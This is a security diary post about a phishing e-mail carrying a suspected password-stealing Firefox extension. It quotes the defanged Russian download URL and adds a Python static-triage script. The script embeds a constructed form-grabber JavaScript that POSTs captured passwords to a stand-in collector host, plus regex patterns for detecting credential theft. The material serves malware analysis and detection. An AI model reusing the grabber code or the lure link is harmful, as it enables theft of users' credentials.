Firefox extension used as password stealer?

A reader sent us a suspicious e-mail, which included a link to an .xpi file (a Firefox extension) as attachment. Looks like a very nice find! I am still looking at the extension. Just from a preliminary glance at it, the extension may try to steal the content of form fields.

The origin appears to be Russian. The link went to ht tp : //qs-s.  nm.  ru (again: inserted spaces to protect the innocent)


The e-mail:

We have received mnoey. Here your book. Read and grow rich!
ht tp:// qs-s. nm. ru - We have received money. Here your book. Read adn grow rich!

(and thanks to the person posting the comment below for pointing out that I forgot to break up the second instance of the URL :-) ).

Still working on figuring out exactly what this does, e.g. if it is just adware or actually steals passwords. May have to wait until I get home and get to run it in the lab.

Johannes B. Ullrich, Ph.D.
SANS Technology Institute




Dec 12th 2008
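The diary stops short of analyzing the extension, so as an added example (not the diary's code, and not a description of this particular sample) here is the first static pass I would do on an .xpi before running it in the lab. An .xpi is a plain ZIP archive: a legacy (XUL overlay) extension carries an install.rdf manifest and its JavaScript under chrome/. The script below unpacks the archive in memory, pulls the extension id, and flags scripts that touch form fields or password inputs and that also have an outbound channel. The sample archive is constructed inline for the example, and the indicator regexes are my own heuristics, not signatures of the sample in the diary.

```python
"""Static triage of a Firefox .xpi before it goes anywhere near a browser.

Added example. The indicators below are the editor's own assumptions about
what a form-field stealer in a legacy XUL extension would contain; they are
not derived from the sample discussed in the diary.
"""
import io
import re
import zipfile
from typing import Dict, Optional, Set

# Heuristic indicators (assumed, not a signature database).
INDICATORS = {
    # reads password inputs, by type attribute or by walking input elements
    "password_fields": re.compile(
        r"type\s*==?\s*['\"]?password|\.password\b|getElementsByTagName\(['\"]input['\"]\)", re.I),
    # enumerates form elements or hooks the submit event
    "form_access": re.compile(
        r"document\.forms|\.elements\b|addEventListener\(['\"]submit", re.I),
    # has a way to send data out
    "network": re.compile(
        r"XMLHttpRequest|nsIHttpChannel|nsIXMLHttpRequest|\bhttp://", re.I),
    # observes every outgoing request (a common place to sniff POST bodies)
    "http_observer": re.compile(r"http-on-modify-request|nsIObserverService", re.I),
}

def load_xpi(data: bytes) -> Dict[str, bytes]:
    """Return {member_name: bytes}; an .xpi is just a ZIP file."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {n: zf.read(n) for n in zf.namelist() if not n.endswith("/")}

def extension_id(members: Dict[str, bytes]) -> Optional[str]:
    """Pull <em:id> from install.rdf (legacy extension manifest), if present."""
    rdf = members.get("install.rdf")
    if rdf is None:
        return None
    m = re.search(r"<em:id>([^<]+)</em:id>", rdf.decode("utf-8", errors="replace"))
    return m.group(1).strip() if m else None

def triage(members: Dict[str, bytes]) -> Dict[str, Set[str]]:
    """Map each script/overlay member to the set of indicator names it matched."""
    hits: Dict[str, Set[str]] = {}
    for name, blob in members.items():
        if not name.lower().endswith((".js", ".jsm", ".xul")):
            continue
        text = blob.decode("utf-8", errors="replace")
        matched = {k for k, rx in INDICATORS.items() if rx.search(text)}
        if matched:
            hits[name] = matched
    return hits

def verdict(hits: Dict[str, Set[str]]) -> str:
    """Collapse the per-file hits into one triage label."""
    flags: Set[str] = set().union(*hits.values()) if hits else set()
    steals = bool(flags & {"password_fields", "form_access"})
    exfil = bool(flags & {"network", "http_observer"})
    if steals and exfil:
        return "credential-stealer"   # reads form fields AND can send them out
    if steals:
        return "form-access-only"
    if exfil:
        return "network-only"
    return "clean"

def build_sample_xpi() -> bytes:
    """Constructed sample for this example; NOT the extension from the diary."""
    install_rdf = b"""<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
     xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <Description about="urn:mozilla:install-manifest">
    <em:id>sample-stealer@example.invalid</em:id>
    <em:name>Sample</em:name>
  </Description>
</RDF>"""
    # Typical shape of a form grabber: capture-phase submit hook, collect
    # password inputs, POST them to a collector (hypothetical host).
    overlay_js = b"""
window.addEventListener("submit", function (e) {
  var f = e.target, out = [];
  for (var i = 0; i < f.elements.length; i++) {
    if (f.elements[i].type == "password")
      out.push(f.elements[i].name + "=" + f.elements[i].value);
  }
  var x = new XMLHttpRequest();
  x.open("POST", "http://collector.example.invalid/", true);
  x.send(out.join("&"));
}, true);
"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("install.rdf", install_rdf)
        zf.writestr("chrome/content/overlay.js", overlay_js)
        zf.writestr("chrome/content/overlay.xul", b"<overlay/>")
    return buf.getvalue()

if __name__ == "__main__":
    members = load_xpi(build_sample_xpi())
    print("id:", extension_id(members))
    for name, flags in triage(members).items():
        print(name, sorted(flags))
    print("verdict:", verdict(triage(members)))
```

To use it on a real sample, replace build_sample_xpi() with the bytes of the attachment. A hit here is only a reason to prioritize the dynamic run, not a conclusion: obfuscated or eval-built strings will slip past these regexes, and a benign form-filler legitimately matches the first two indicators, which is why the verdict requires an outbound channel as well.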
:) but you haven't protected the innocent in the next lines ...
